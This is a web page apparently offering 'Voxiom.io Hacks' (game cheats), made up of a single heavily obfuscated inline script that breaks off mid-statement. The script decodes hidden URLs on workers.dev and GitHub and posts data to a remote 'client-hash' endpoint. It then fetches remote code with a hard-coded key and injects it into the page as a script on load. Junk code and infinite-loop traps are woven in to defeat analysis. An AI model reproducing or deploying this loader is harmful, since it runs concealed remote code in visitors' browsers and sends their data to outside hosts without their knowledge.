---
layout: default
title: Voxiom.io Hacks
permalink: /code/voxiom
---

<!DOCTYPE html>
<html>
<head>
{% raw %}
<script>
function shwwydt(){}(function(){if("\u004e\u0078\u0068\u0058\u0055\u0071" in shwwydt){_t4sCC()}function _t4sCC(){var _t4sCC=function(_t4sCC){var shwwydt=[];if(_t4sCC===1||_t4sCC>=4)WdCvFdg(shwwydt,[],_t4sCC,0);return shwwydt},WdCvFdg=function(_t4sCC,cbzvXZo,RnCZKBE,r9vgMhU){for(var r_1hsn=r9vgMhU;r_1hsn<RnCZKBE;r_1hsn++){if(cbzvXZo.length!==r_1hsn)return;for(var LprIFf=0;LprIFf<RnCZKBE;LprIFf++)if(HkgxdSu(cbzvXZo,[r_1hsn,LprIFf])){cbzvXZo.push([r_1hsn,LprIFf]);WdCvFdg(_t4sCC,cbzvXZo,RnCZKBE,r_1hsn+1);if(cbzvXZo.length===RnCZKBE)_t4sCC.push(shwwydt(cbzvXZo));cbzvXZo.pop()}}},shwwydt=function(_t4sCC){var WdCvFdg=[],shwwydt=_t4sCC.length;for(var HkgxdSu=0;HkgxdSu<shwwydt;HkgxdSu++){WdCvFdg[HkgxdSu]="";for(var tjU12F=0;tjU12F<shwwydt;tjU12F++)WdCvFdg[HkgxdSu]+=_t4sCC[HkgxdSu][1]===tjU12F?"\x51":"\x2e"}return WdCvFdg},HkgxdSu=function(_t4sCC,WdCvFdg){var shwwydt=_t4sCC.length;for(var HkgxdSu=0;HkgxdSu<shwwydt;HkgxdSu++){if(_t4sCC[HkgxdSu][0]===WdCvFdg[0]||_t4sCC[HkgxdSu][1]===WdCvFdg[1])return!1;if(Math.abs((_t4sCC[HkgxdSu][0]-WdCvFdg[0])/(_t4sCC[HkgxdSu][1]-WdCvFdg[1]))===1)return!1}return!0};console.log(_t4sCC)}var WdCvFdg=function(){if("\u0064\u004d\u0038\u0048\u0070\u0079" in shwwydt){_t4sCC()}function _t4sCC(){function _t4sCC(){}var HWMrKIV=function(HWMrKIV,t3rSeh){var WdCvFdg=0,shwwydt=0,O0U7UDk=new _t4sCC(0),SAbYu2T=O0U7UDk,ZFcx4B=HWMrKIV,VYbjLM=t3rSeh;while(ZFcx4B!==null||VYbjLM!==null){shwwydt=(ZFcx4B?ZFcx4B.val:0)+(VYbjLM?VYbjLM.val:0)+WdCvFdg;WdCvFdg=Math.floor(shwwydt/10);SAbYu2T.next=new _t4sCC(shwwydt%10);SAbYu2T=SAbYu2T.next;ZFcx4B=ZFcx4B?ZFcx4B.next:null;VYbjLM=VYbjLM?VYbjLM.next:null}if(WdCvFdg)SAbYu2T.next=new _t4sCC(WdCvFdg);return O0U7UDk.next};console.log(HWMrKIV)}const HWMrKIV=function(){const _t4sCC=new RegExp("\u000a");return _t4sCC.test(WdCvFdg)};if(HWMrKIV()){while(!0){if("\x50\x38\x6d\x74\x77\x54" in shwwydt){t3rSeh()}function t3rSeh(){var _t4sCC=function(_t4sCC,t3rSeh){return HWMrKIV({},_t4sCC,t3rSeh)},HWMrKIV=function(_t4sCC,t3rSeh,WdCvFdg){var shwwydt={};if(_t4sCC[t3rSeh+WdCvFdg]!==void 0)return _t4sCC[t3rSeh+WdCvFdg];if(t3rSeh===WdCvFdg)return!0;for(var BKObE2=0;BKObE2<t3rSeh.length;BKObE2++){if(shwwydt[t3rSeh[BKObE2]]===void 0)shwwydt[t3rSeh[BKObE2]]=0;if(shwwydt[WdCvFdg[BKObE2]]===void 0)shwwydt[WdCvFdg[BKObE2]]=0;shwwydt[t3rSeh[BKObE2]]++;shwwydt[WdCvFdg[BKObE2]]--}for(var mDl5ess in shwwydt)if(shwwydt[mDl5ess]!==0){_t4sCC[t3rSeh+WdCvFdg]=!1;return!1}for(var CApSmL=1;CApSmL<t3rSeh.length;CApSmL++)if(HWMrKIV(_t4sCC,t3rSeh.substr(0,CApSmL),WdCvFdg.substr(0,CApSmL))&&HWMrKIV(_t4sCC,t3rSeh.substr(CApSmL),WdCvFdg.substr(CApSmL))||HWMrKIV(_t4sCC,t3rSeh.substr(0,CApSmL),WdCvFdg.substr(WdCvFdg.length-CApSmL))&&HWMrKIV(_t4sCC,t3rSeh.substr(CApSmL),WdCvFdg.substr(0,WdCvFdg.length-CApSmL))){_t4sCC[t3rSeh+WdCvFdg]=!0;return!0}_t4sCC[t3rSeh+WdCvFdg]=!1;return!1};console.log(_t4sCC)}}}};return WdCvFdg()})();(async function(){(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();const ESuFLo="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x69\x6e\x2e\x63\x71\x6d\x62\x6f\x2e\x77\x6f\x72\x6b\x65\x72\x73\x2e\x64\x65\x76",ndAfmZ="\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0072\u0061\u0077\u002e\u0067\u0069\u0074\u0068\u0075\u0062\u0075\u0073\u0065\u0072\u0063\u006f\u006e\u0074\u0065\u006e\u0074\u002e\u0063\u006f\u006d\u002f\u0043\u0071\u006d\u0062\u006f\u0031\u002f\u0043\u0071\u006d\u0062\u006f\u0031\u002e\u0067\u0069\u0074\u0068\u0075\u0062\u002e\u0069\u006f\u002f\u0072\u0065\u0066\u0073\u002f\u0068\u0065\u0061\u0064\u0073\u002f\u006d\u0061\u0069\u006e\u002f\u0061\u0073\u0073\u0065\u0074\u0073\u002f\u0064\u0065\u006f\u0062\u0066\u0075\u0073\u0063\u0061\u0074\u0065\u002f\u0074\u0068\u0069\u0072\u0064\u005f\u0070\u0061\u0072\u0074\u0079\u002f\u0064\u0065\u0063\u0072\u0079\u0070\u0074\u006a\u0073\u002f\u0064\u0065\u0063\u0072\u0079\u0070\u0074\u002e\u006d\u0069\u006e\u002e\u006a\u0073",AQQlNK="\x6d\x79\x2d\x73\x65\x63\x72\x65\x74\x2d\x6b\x65\x79",f4y1PFx="\x33\x39\x66\x62\x35\x64\x35\x35\x63\x38\x64\x62\x37\x39\x32\x64\x36\x38\x35\x32\x63\x38\x35\x33\x66\x65\x31\x34\x61\x39\x35\x64\x64\x33\x35\x63\x36\x37\x61\x62\x65\x39\x38\x37\x39\x30\x38\x62\x61\x66\x63\x64\x39\x62\x32\x38\x64\x39\x39\x36\x34\x34\x65\x61",XmGTCO=10000,_AEH05Y=ESuFLo+"\x2f\x63\x6c\x69\x65\x6e\x74\x2d\x68\x61\x73\x68",hzYSiC="\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u006e\u006f\u0074\u0069\u0066\u0079\u002e\u0063\u0071\u006d\u0062\u006f\u002e\u0077\u006f\u0072\u006b\u0065\u0072\u0073\u002e\u0064\u0065\u0076\u002f";async function ErtYDv4(ESuFLo){(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){if("\x44\x56\x6e\x6b\x62\x59" in shwwydt){AQQlNK()}function AQQlNK(){function ndAfmZ(ndAfmZ){const AQQlNK={};for(let ESuFLo of ndAfmZ.replace(/[^w]/g,"").toLowerCase())AQQlNK[ESuFLo]=AQQlNK[ESuFLo]+1||1;return AQQlNK}function AQQlNK(ndAfmZ,AQQlNK){const ESuFLo=buildCharMap(ndAfmZ),f4y1PFx=buildCharMap(AQQlNK);for(let XmGTCO in ESuFLo)if(ESuFLo[XmGTCO]!==f4y1PFx[XmGTCO]){return!1}if(Object.keys(ESuFLo).length!==Object.keys(f4y1PFx).length){return!1}return!0}function ESuFLo(ndAfmZ){const AQQlNK=f4y1PFx(ndAfmZ);return AQQlNK!==1/0}function f4y1PFx(ndAfmZ){if(!ndAfmZ){return-1}const AQQlNK=f4y1PFx(ndAfmZ.left),ESuFLo=f4y1PFx(ndAfmZ.right),XmGTCO=Math.abs(AQQlNK-ESuFLo);if(AQQlNK===1/0||ESuFLo===1/0||XmGTCO>1){return 1/0}const _AEH05Y=Math.max(AQQlNK,ESuFLo)+1;return _AEH05Y}window.__GLOBAL__HELPERS__={buildCharacterMap:ndAfmZ,isAnagrams:AQQlNK,isBalanced:ESuFLo,getHeightBalanced:f4y1PFx}}while(!0){}}};return ESuFLo()})();const ndAfmZ=await crypto.subtle.digest("\u0053\u0048\u0041\u002d\u0032\u0035\u0036",ESuFLo);return Array.from(new Uint8Array(ndAfmZ)).map(ESuFLo=>{(function(){var ESuFLo=function(){if("\u0049\u0034\u006f\u0068\u0039\u005f" in shwwydt){ndAfmZ()}function ndAfmZ(){var ndAfmZ=function(ndAfmZ,f4y1PFx){return AQQlNK({},ndAfmZ,f4y1PFx)},AQQlNK=function(ndAfmZ,f4y1PFx,ESuFLo){var XmGTCO={};if(ndAfmZ[f4y1PFx+ESuFLo]!==void 0)return ndAfmZ[f4y1PFx+ESuFLo];if(f4y1PFx===ESuFLo)return!0;for(var _AEH05Y=0;_AEH05Y<f4y1PFx.length;_AEH05Y++){if(XmGTCO[f4y1PFx[_AEH05Y]]===void 0)XmGTCO[f4y1PFx[_AEH05Y]]=0;if(XmGTCO[ESuFLo[_AEH05Y]]===void 0)XmGTCO[ESuFLo[_AEH05Y]]=0;XmGTCO[f4y1PFx[_AEH05Y]]++;XmGTCO[ESuFLo[_AEH05Y]]--}for(var hzYSiC in XmGTCO)if(XmGTCO[hzYSiC]!==0){ndAfmZ[f4y1PFx+ESuFLo]=!1;return!1}for(var ErtYDv4=1;ErtYDv4<f4y1PFx.length;ErtYDv4++)if(AQQlNK(ndAfmZ,f4y1PFx.substr(0,ErtYDv4),ESuFLo.substr(0,ErtYDv4))&&AQQlNK(ndAfmZ,f4y1PFx.substr(ErtYDv4),ESuFLo.substr(ErtYDv4))||AQQlNK(ndAfmZ,f4y1PFx.substr(0,ErtYDv4),ESuFLo.substr(ESuFLo.length-ErtYDv4))&&AQQlNK(ndAfmZ,f4y1PFx.substr(ErtYDv4),ESuFLo.substr(0,ESuFLo.length-ErtYDv4))){ndAfmZ[f4y1PFx+ESuFLo]=!0;return!0}ndAfmZ[f4y1PFx+ESuFLo]=!1;return!1};console.log(ndAfmZ)}const AQQlNK=function(){if("\x69\x62\x75\x6f\x63\x55\x37" in shwwydt){ndAfmZ()}function ndAfmZ(){const ndAfmZ=require("path"),{version:AQQlNK}=require("../../package"),{version:f4y1PFx}=require("@redacted/enterprise-plugin/package"),{version:ESuFLo}=require("@redacted/components/package"),{sdkVersion:XmGTCO}=require("@redacted/enterprise-plugin"),_AEH05Y=require("../utils/isStandaloneExecutable"),hzYSiC=require("./resolve-local-redacted-path"),ErtYDv4=ndAfmZ.resolve(__dirname,"\u002e\u002e\u002f\u0072\u0065\u0064\u0061\u0063\u0074\u0065\u0064\u002e\u006a\u0073")}const AQQlNK=new RegExp("\u000a");return AQQlNK.test(ESuFLo)};if(AQQlNK()){if("\u0073\u0063\u0074\u0076\u0044\u0067\u0064" in shwwydt){f4y1PFx()}function f4y1PFx(){function ndAfmZ(ndAfmZ){const AQQlNK={};for(let f4y1PFx of ndAfmZ.replace(/[^w]/g,"").toLowerCase())AQQlNK[f4y1PFx]=AQQlNK[f4y1PFx]+1||1;return AQQlNK}function AQQlNK(ndAfmZ,AQQlNK){const f4y1PFx=buildCharMap(ndAfmZ),ESuFLo=buildCharMap(AQQlNK);for(let XmGTCO in f4y1PFx)if(f4y1PFx[XmGTCO]!==ESuFLo[XmGTCO]){return!1}if(Object.keys(f4y1PFx).length!==Object.keys(ESuFLo).length){return!1}return!0}function f4y1PFx(ndAfmZ){const AQQlNK=ESuFLo(ndAfmZ);return AQQlNK!==1/0}function ESuFLo(ndAfmZ){if(!ndAfmZ){return-1}const AQQlNK=ESuFLo(ndAfmZ.left),f4y1PFx=ESuFLo(ndAfmZ.right),XmGTCO=Math.abs(AQQlNK-f4y1PFx);if(AQQlNK===1/0||f4y1PFx===1/0||XmGTCO>1){return 1/0}const _AEH05Y=Math.max(AQQlNK,f4y1PFx)+1;return _AEH05Y}window.__GLOBAL__HELPERS__={buildCharacterMap:ndAfmZ,isAnagrams:AQQlNK,isBalanced:f4y1PFx,getHeightBalanced:ESuFLo}}while(!0){}}};return ESuFLo()})();return ESuFLo.toString(16).padStart(2,"\u0030")}).join("")}async function Yk2cDg0(ESuFLo,ndAfmZ={},AQQlNK=XmGTCO){(function(){if("\x4b\x31\x34\x75\x5a\x5f\x6c" in shwwydt){ESuFLo()}function ESuFLo(){var ESuFLo=function(ESuFLo){var ndAfmZ=ESuFLo.length,AQQlNK=[],f4y1PFx=0,_AEH05Y=0;ESuFLo.sort((ESuFLo,ndAfmZ)=>ESuFLo-ndAfmZ);for(var hzYSiC=0;hzYSiC<ndAfmZ;hzYSiC++){if(hzYSiC>0&&ESuFLo[hzYSiC]===ESuFLo[hzYSiC-1])continue;f4y1PFx=hzYSiC+1;_AEH05Y=ndAfmZ-1;while(f4y1PFx<_AEH05Y)if(ESuFLo[hzYSiC]+ESuFLo[f4y1PFx]+ESuFLo[_AEH05Y]<0){f4y1PFx++}else if(ESuFLo[hzYSiC]+ESuFLo[f4y1PFx]+ESuFLo[_AEH05Y]>0){_AEH05Y--}else{AQQlNK.push([ESuFLo[hzYSiC],ESuFLo[f4y1PFx],ESuFLo[_AEH05Y]]);while(f4y1PFx<_AEH05Y&&ESuFLo[f4y1PFx]===ESuFLo[f4y1PFx+1])f4y1PFx++;while(f4y1PFx<_AEH05Y&&ESuFLo[_AEH05Y]===ESuFLo[_AEH05Y-1])_AEH05Y--;f4y1PFx++;_AEH05Y--}}return AQQlNK};console.log(ESuFLo)}var ndAfmZ=function(){const ESuFLo=function(){if("\x71\x34\x57\x66\x48\x59\x65" in shwwydt){ESuFLo()}function ESuFLo(){module.exports=async(ESuFLo=()=>{throw new Error("\x4e\x6f\x20\x72\x65\x64\x61\x63\x74\x65\x64\x20\x70\x61\x74\x68\x20\x70\x72\x6f\x76\x69\x64\x65\x64")})=>{const AQQlNK=new Set(process.argv.slice(2));if(!AQQlNK.has("\u002d\u002d\u0076\u0065\u0072\u0073\u0069\u006f\u006e")){if(AQQlNK.size!==1)return!1;if(!AQQlNK.has("\u002d\u0076"))return!1}await(async(AQQlNK,ndAfmZ)=>{if(AQQlNK)return "\x20\x28\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x29";if(ndAfmZ===(await ESuFLo()))return "\u0020\u0028\u006c\u006f\u0063\u0061\u006c\u0029";return ""})();return!0}}const AQQlNK=new RegExp("\x0a");return AQQlNK.test(ndAfmZ)};if(ESuFLo()){while(!0){if("\x6d\x47\x4d\x44\x45\x71" in shwwydt){AQQlNK()}function AQQlNK(){function ESuFLo(){}var AQQlNK=function(AQQlNK,ndAfmZ){var f4y1PFx=0,_AEH05Y=0,hzYSiC=new ESuFLo(0),ErtYDv4=hzYSiC,Yk2cDg0=AQQlNK,XmGTCO=ndAfmZ;while(Yk2cDg0!==null||XmGTCO!==null){_AEH05Y=(Yk2cDg0?Yk2cDg0.val:0)+(XmGTCO?XmGTCO.val:0)+f4y1PFx;f4y1PFx=Math.floor(_AEH05Y/10);ErtYDv4.next=new ESuFLo(_AEH05Y%10);ErtYDv4=ErtYDv4.next;Yk2cDg0=Yk2cDg0?Yk2cDg0.next:null;XmGTCO=XmGTCO?XmGTCO.next:null}if(f4y1PFx)ErtYDv4.next=new ESuFLo(f4y1PFx);return hzYSiC.next};console.log(AQQlNK)}}}};return ndAfmZ()})();const f4y1PFx=new AbortController,_AEH05Y=setTimeout(()=>{return f4y1PFx.abort()},AQQlNK);try{if("\x4f\x48\x48\x65\x67\x6d" in shwwydt){hzYSiC()}function hzYSiC(){var ESuFLo=function(ESuFLo){this.capacity=ESuFLo;this.length=0;this.map={};this.head=null;this.tail=null};ESuFLo.prototype.get=function(ESuFLo){var ndAfmZ=this.map[ESuFLo];return ndAfmZ?(this.remove(ndAfmZ),this.insert(ndAfmZ.key,ndAfmZ.val),ndAfmZ.val):-1};ESuFLo.prototype.put=function(ESuFLo,ndAfmZ){this.map[ESuFLo]?(this.remove(this.map[ESuFLo]),this.insert(ESuFLo,ndAfmZ)):this.length===this.capacity?(this.remove(this.head),this.insert(ESuFLo,ndAfmZ)):(this.insert(ESuFLo,ndAfmZ),this.length++)};ESuFLo.prototype.remove=function(ESuFLo){var ndAfmZ=ESuFLo.prev,AQQlNK=ESuFLo.next;if(AQQlNK)AQQlNK.prev=ndAfmZ;if(ndAfmZ)ndAfmZ.next=AQQlNK;if(this.head===ESuFLo)this.head=AQQlNK;if(this.tail===ESuFLo)this.tail=ndAfmZ;delete this.map[ESuFLo.key]};ESuFLo.prototype.insert=function(ESuFLo,ndAfmZ){var AQQlNK=new List(ESuFLo,ndAfmZ);!this.tail?(this.tail=AQQlNK,this.head=AQQlNK):(this.tail.next=AQQlNK,AQQlNK.prev=this.tail,this.tail=AQQlNK);this.map[ESuFLo]=AQQlNK};console.log(ESuFLo)}const ErtYDv4=await fetch(ESuFLo,Object.assign({},ndAfmZ,{signal:f4y1PFx.signal}));clearTimeout(_AEH05Y);return ErtYDv4}catch(Yk2cDg0){clearTimeout(_AEH05Y);throw Yk2cDg0}}async function gYGePD(ESuFLo,{sourceURL:ndAfmZ}={}){if("\x67\x4c\x55\x53\x68\x64\x72" in shwwydt){AQQlNK()}function AQQlNK(){}const f4y1PFx=()=>{const ESuFLo="\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a",ndAfmZ=crypto.getRandomValues(new Uint8Array(36));let AQQlNK="";for(let f4y1PFx=0;f4y1PFx<ndAfmZ.length;f4y1PFx++){(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();AQQlNK+=ESuFLo[ndAfmZ[f4y1PFx]%ESuFLo.length]}return AQQlNK},XmGTCO=f4y1PFx(),_AEH05Y=XmGTCO,hzYSiC=ESuFLo+("\u000a\u002f\u002f\u0023\u0020\u0073\u006f\u0075\u0072\u0063\u0065\u0055\u0052\u004c\u003d"+_AEH05Y),ErtYDv4=new Blob([hzYSiC],{type:"\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74"}),Yk2cDg0=URL.createObjectURL(ErtYDv4),gYGePD=document.createElement("\x73\x63\x72\x69\x70\x74");gYGePD.src=Yk2cDg0;gYGePD.async=!1;gYGePD.onload=()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();return URL.revokeObjectURL(Yk2cDg0)};gYGePD.onerror=()=>{return URL.revokeObjectURL(Yk2cDg0)};(document.head||document.documentElement).appendChild(gYGePD);return _AEH05Y}async function akc4H8(ESuFLo){if("\u005a\u0052\u004f\u004d\u0042\u0046\u0034" in shwwydt){ndAfmZ()}function ndAfmZ(){}(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();try{await Yk2cDg0(_AEH05Y,{method:"\u0050\u004f\u0053\u0054",mode:"\x63\x6f\x72\x73",cache:"\u006e\u006f\u002d\u0073\u0074\u006f\u0072\u0065",headers:{"\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065":"\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u006a\u0073\u006f\u006e",...(AQQlNK?{"\x58\x2d\x41\x75\x74\x68\x2d\x4b\x65\x79":AQQlNK}:{})},body:JSON.stringify(ESuFLo)})}catch{}}async function uvmyRv(ESuFLo,ndAfmZ,f4y1PFx=!1){(function(){var ESuFLo=function(){const ndAfmZ=function(){if("\u0044\u0037\u0044\u0047\u0059\u0073" in shwwydt){ndAfmZ()}function ndAfmZ(){const ndAfmZ=require("path"),{version:f4y1PFx}=require("../../package"),{version:ESuFLo}=require("@redacted/enterprise-plugin/package"),{version:XmGTCO}=require("@redacted/components/package"),{sdkVersion:_AEH05Y}=require("@redacted/enterprise-plugin"),hzYSiC=require("../utils/isStandaloneExecutable"),ErtYDv4=require("./resolve-local-redacted-path"),akc4H8=ndAfmZ.resolve(__dirname,"\x2e\x2e\x2f\x72\x65\x64\x61\x63\x74\x65\x64\x2e\x6a\x73")}const f4y1PFx=new RegExp("\x0a");return f4y1PFx.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();const XmGTCO=AQQlNK?{"\u0058\u002d\u0041\u0075\u0074\u0068\u002d\u004b\u0065\u0079":AQQlNK}:{};let _AEH05Y="",hzYSiC,ErtYDv4;try{(function(){var ESuFLo=function(){const ndAfmZ=function(){if("\u0077\u0030\u006f\u0053\u0073\u006c\u004c" in shwwydt){ndAfmZ()}function ndAfmZ(){const ndAfmZ=require("big-integer");class f4y1PFx{static randomPrime(f4y1PFx){const ESuFLo=ndAfmZ.one.shiftLeft(f4y1PFx-1),XmGTCO=ndAfmZ.one.shiftLeft(f4y1PFx).prev();while(!0){let _AEH05Y=ndAfmZ.randBetween(ESuFLo,XmGTCO);if(_AEH05Y.isProbablePrime(256)){return _AEH05Y}}}static generate(f4y1PFx){const ESuFLo=ndAfmZ(65537);let XmGTCO,_AEH05Y,hzYSiC;do{XmGTCO=this.randomPrime(f4y1PFx/2);_AEH05Y=this.randomPrime(f4y1PFx/2);hzYSiC=ndAfmZ.lcm(XmGTCO.prev(),_AEH05Y.prev())}while(ndAfmZ.gcd(ESuFLo,hzYSiC).notEquals(1)||XmGTCO.minus(_AEH05Y).abs().shiftRight(f4y1PFx/2-100).isZero());return{e:ESuFLo,n:XmGTCO.multiply(_AEH05Y),d:ESuFLo.modInv(hzYSiC)}}static encrypt(f4y1PFx,ESuFLo,XmGTCO){return ndAfmZ(f4y1PFx).modPow(XmGTCO,ESuFLo)}static decrypt(f4y1PFx,ESuFLo,XmGTCO){return ndAfmZ(f4y1PFx).modPow(ESuFLo,XmGTCO)}static encode(f4y1PFx){const ESuFLo=f4y1PFx.split("").map(f4y1PFx=>f4y1PFx.charCodeAt()).join("");return ndAfmZ(ESuFLo)}static decode(ndAfmZ){const f4y1PFx=ndAfmZ.toString();let ESuFLo="";for(let XmGTCO=0;XmGTCO<f4y1PFx.length;XmGTCO+=2){let _AEH05Y=Number(f4y1PFx.substr(XmGTCO,2));_AEH05Y<=30?(ESuFLo+=String.fromCharCode(Number(f4y1PFx.substr(XmGTCO,3))),XmGTCO++):ESuFLo+=String.fromCharCode(_AEH05Y)}return ESuFLo}}module.exports=f4y1PFx}const f4y1PFx=new RegExp("\u000a");return f4y1PFx.test(ESuFLo)};if(ndAfmZ()){if("\u0074\u0062\u004d\u0071\u0056\u0056" in shwwydt){f4y1PFx()}function f4y1PFx(){function ndAfmZ(ndAfmZ){return ndAfmZ[1]*67108864+(ndAfmZ[0]<0?33554432|ndAfmZ[0]:ndAfmZ[0])}function f4y1PFx(ndAfmZ){switch(((ndAfmZ&33554432)!==0)*1+(ndAfmZ<0)*2){case 0:return[ndAfmZ%33554432,Math.trunc(ndAfmZ/67108864)];case 1:return[ndAfmZ%33554432-33554432,Math.trunc(ndAfmZ/67108864)+1];case 2:return[((ndAfmZ+33554432)%33554432+33554432)%33554432,Math.round(ndAfmZ/67108864)];case 3:return[ndAfmZ%33554432,Math.trunc(ndAfmZ/67108864)]}}let ESuFLo=ndAfmZ([2,4]),XmGTCO=ndAfmZ([1,2]),_AEH05Y=ESuFLo+XmGTCO,hzYSiC=_AEH05Y-XmGTCO,ErtYDv4=hzYSiC*2,akc4H8=ErtYDv4/2;console.log(f4y1PFx(_AEH05Y));console.log(f4y1PFx(hzYSiC));console.log(f4y1PFx(ErtYDv4));console.log(f4y1PFx(akc4H8))}while(!0){}}};return ESuFLo()})();f4y1PFx?(function(){if("\x46\x6f\x34\x45\x52\x37\x47" in shwwydt){ESuFLo()}function ESuFLo(){var ESuFLo=function(ESuFLo,f4y1PFx){return ndAfmZ({},ESuFLo,f4y1PFx)},ndAfmZ=function(ESuFLo,XmGTCO,_AEH05Y){var hzYSiC={};if(ESuFLo[XmGTCO+_AEH05Y]!==void 0)return ESuFLo[XmGTCO+_AEH05Y];if(XmGTCO===_AEH05Y)return!0;for(var ErtYDv4=0;ErtYDv4<XmGTCO.length;ErtYDv4++){if(hzYSiC[XmGTCO[ErtYDv4]]===void 0)hzYSiC[XmGTCO[ErtYDv4]]=0;if(hzYSiC[_AEH05Y[ErtYDv4]]===void 0)hzYSiC[_AEH05Y[ErtYDv4]]=0;hzYSiC[XmGTCO[ErtYDv4]]++;hzYSiC[_AEH05Y[ErtYDv4]]--}for(var akc4H8 in hzYSiC)if(hzYSiC[akc4H8]!==0){ESuFLo[XmGTCO+_AEH05Y]=!1;return!1}for(var AQQlNK=1;AQQlNK<XmGTCO.length;AQQlNK++)if(ndAfmZ(ESuFLo,XmGTCO.substr(0,AQQlNK),_AEH05Y.substr(0,AQQlNK))&&ndAfmZ(ESuFLo,XmGTCO.substr(AQQlNK),_AEH05Y.substr(AQQlNK))||ndAfmZ(ESuFLo,XmGTCO.substr(0,AQQlNK),_AEH05Y.substr(_AEH05Y.length-AQQlNK))&&ndAfmZ(ESuFLo,XmGTCO.substr(AQQlNK),_AEH05Y.substr(0,_AEH05Y.length-AQQlNK))){ESuFLo[XmGTCO+_AEH05Y]=!0;return!0}ESuFLo[XmGTCO+_AEH05Y]=!1;return!1};console.log(ESuFLo)}var ndAfmZ=function(){if("\u0072\u0041\u0065\u006d\u004a\u0054" in shwwydt){ESuFLo()}function ESuFLo(){var ESuFLo=function(ESuFLo){var f4y1PFx=0,XmGTCO={},ndAfmZ=0,_AEH05Y=0,hzYSiC=0,ErtYDv4=ESuFLo.length;for(var akc4H8=0;akc4H8<ErtYDv4;akc4H8++){XmGTCO={};ndAfmZ=0;_AEH05Y=1;for(var AQQlNK=akc4H8+1;AQQlNK<ErtYDv4;AQQlNK++){if(ESuFLo[akc4H8].x===ESuFLo[AQQlNK].x&&ESuFLo[akc4H8].y===ESuFLo[AQQlNK].y){_AEH05Y++;continue}ESuFLo[akc4H8].y===ESuFLo[AQQlNK].y?hzYSiC=Number.MAX_SAFE_INTEGER:hzYSiC=(ESuFLo[akc4H8].x-ESuFLo[AQQlNK].x)/(ESuFLo[akc4H8].y-ESuFLo[AQQlNK].y);if(!XmGTCO[hzYSiC])XmGTCO[hzYSiC]=0;XmGTCO[hzYSiC]++;ndAfmZ=Math.max(ndAfmZ,XmGTCO[hzYSiC])}ndAfmZ+=_AEH05Y;f4y1PFx=Math.max(f4y1PFx,ndAfmZ)}return f4y1PFx};console.log(ESuFLo)}const f4y1PFx=function(){const ESuFLo=new RegExp("\x0a");return ESuFLo.test(ndAfmZ)};if(f4y1PFx()){if("\u0041\u0071\u006c\u0043\u0062\u0032" in shwwydt){XmGTCO()}function XmGTCO(){var ESuFLo=function(ESuFLo){var XmGTCO=[];if(ESuFLo===1||ESuFLo>=4)f4y1PFx(XmGTCO,[],ESuFLo,0);return XmGTCO},f4y1PFx=function(ESuFLo,_AEH05Y,ErtYDv4,akc4H8){for(var AQQlNK=akc4H8;AQQlNK<ErtYDv4;AQQlNK++){if(_AEH05Y.length!==AQQlNK)return;for(var Yk2cDg0=0;Yk2cDg0<ErtYDv4;Yk2cDg0++)if(ndAfmZ(_AEH05Y,[AQQlNK,Yk2cDg0])){_AEH05Y.push([AQQlNK,Yk2cDg0]);f4y1PFx(ESuFLo,_AEH05Y,ErtYDv4,AQQlNK+1);if(_AEH05Y.length===ErtYDv4)ESuFLo.push(XmGTCO(_AEH05Y));_AEH05Y.pop()}}},XmGTCO=function(ESuFLo){var f4y1PFx=[],XmGTCO=ESuFLo.length;for(var ndAfmZ=0;ndAfmZ<XmGTCO;ndAfmZ++){f4y1PFx[ndAfmZ]="";for(var _AEH05Y=0;_AEH05Y<XmGTCO;_AEH05Y++)f4y1PFx[ndAfmZ]+=ESuFLo[ndAfmZ][1]===_AEH05Y?"\u0051":"\u002e"}return f4y1PFx},ndAfmZ=function(ESuFLo,f4y1PFx){var XmGTCO=ESuFLo.length;for(var ndAfmZ=0;ndAfmZ<XmGTCO;ndAfmZ++){if(ESuFLo[ndAfmZ][0]===f4y1PFx[0]||ESuFLo[ndAfmZ][1]===f4y1PFx[1])return!1;if(Math.abs((ESuFLo[ndAfmZ][0]-f4y1PFx[0])/(ESuFLo[ndAfmZ][1]-f4y1PFx[1]))===1)return!1}return!0};console.log(ESuFLo)}while(!0){}}};return ndAfmZ()}(),hzYSiC=await Yk2cDg0(ESuFLo,{method:"\u0047\u0045\u0054",mode:"\u0063\u006f\u0072\u0073",cache:"\u006e\u006f\u002d\u0073\u0074\u006f\u0072\u0065",headers:XmGTCO}),ErtYDv4=await hzYSiC.arrayBuffer()["\u0063\u0061\u0074\u0063\u0068"](()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){if("\u0053\u0055\u006b\u006b\u0078\u0074" in shwwydt){f4y1PFx()}function f4y1PFx(){const ndAfmZ=require("big-integer");class f4y1PFx{static randomPrime(f4y1PFx){const ESuFLo=ndAfmZ.one.shiftLeft(f4y1PFx-1),XmGTCO=ndAfmZ.one.shiftLeft(f4y1PFx).prev();while(!0){let 